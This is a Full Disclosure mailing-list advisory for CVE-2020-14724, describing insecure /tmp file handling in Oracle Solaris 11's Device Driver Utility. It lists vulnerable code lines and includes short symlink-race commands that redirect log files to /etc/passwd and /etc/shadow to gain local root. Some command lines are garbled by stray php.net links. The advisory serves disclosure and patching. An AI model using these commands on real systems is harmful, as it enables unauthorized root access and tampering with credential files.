Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root

["Larry W. Cashdollar via Fulldisclosure" <fulldisclosure () seclists org>]

Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root

Author: Larry W. Cashdollar, @_larry0

Date: 2020-02-02

CVE-2020-14724

Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html

Vendor: Oracle, fixed in July 14 2020 CPU https://www.oracle.com/security-alerts/cpujul2020.html.

Vendor Notified: 2020-02-02

Vendor Contact: secalert_us () oracle com

Advisory: http://www.vapidlabs.com/advisory.php?v=212

Description: "The Device Driver Utility provides information about the devices on your installed system and the drivers 
that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the 
devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility 
recommends a driver package to install."

Vulnerability:

Append contents of ddu_log to system files via symlink attack: 

In ./ddu-text/utils/ddu-text.py 

18 LOG_LOCATION = "/tmp/ddu_log" . 

45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 

50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, 

Elevation of priviledges via symlink attack due to chmod operation on /tmp file: 

In file ./ddu-text/utils/inner_window.py 

667: logfile = open('/tmp/ddu_err.log', 'a') 

695: logfile = open('/tmp/ddu_err.log', 'a') 

721: logfile = open('/tmp/ddu_err.log', 'a') 

748: logfile = open('/tmp/ddu_err.log', 'a') 

In file ./scripts/comp_lookup.sh 

33:typeset err_log=/tmp/ddu_err.log In file ./scripts/det_info.sh 

38:typeset err_log=/tmp/ddu_err.log In file ./scripts/pkg_relate.sh 

449:typeset err_log=/tmp/ddu_err.log In file ./scripts/find_media.sh 

20:typeset err_log=/tmp/ddu_err.log 

There is a race condition here between file creation and chmod 666 where a local user can run a simple script to ensure 
the symlink exists after the ddu_err.log file is removed: 

In file ./scripts/probe.sh 569: 

# Make /tmp/ddu_err.log writable for every user 

571: if [ -f /tmp/ddu_err.log ]; then 

572: pfexec chmod 666 /tmp/ddu_err.log 

574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 

636:typeset err_log=/tmp/ddu_err.log 

These are also potential file clobbering issues: From probe.sh 

131: NIC_info_file=/tmp/dvt_network_info_file 

133: temp_file=/tmp/dvt_network_temp 

134: temp_file_2=/tmp/dvt_network_temp_2 

207: c_file=/tmp/str_ctrl_file 

208: c_file1=/tmp/str_ctrl_file_1 

209: c_file2=/tmp/str_ctrl_file_2 

210: c_file3=/tmp/str_ctrl_file_3 

211: c_file4=/tmp/str_ctrl_file_4 

212: c_file5=/tmp/str_ctrl_file_5 

328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 

329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 

330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 

398: temp_file1=/tmp/dvt_tmp_file1 

399: temp_file2=/tmp/dvt_tmp_file2 

462: cpu_tmpfile=/tmp/cpu_tmpfile 

490: memory_tmpfile=/tmp/memory_tmpfile 

624:typeset ctl_file=/tmp/dvt_ctl_file

 

Exploit Code:

1. Tested on Solaris 11 x86

2. larry@SolSun:~$ uname -a

3. SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc

4. and

5. Open Indiana 

6. root@openindiana:/export/home/larry# uname -a

7. SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc

9. Append content to /etc/passwd

10. larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log

 

12. To get local root simply have ddu http://www.php.net/chmod 666 /etc/shadow

13. larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.http://www.php.net/log; done

14.  

15. A better exploit:

 

https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

 

Patches to OpenIndiana

https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6

 

 

 

 


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/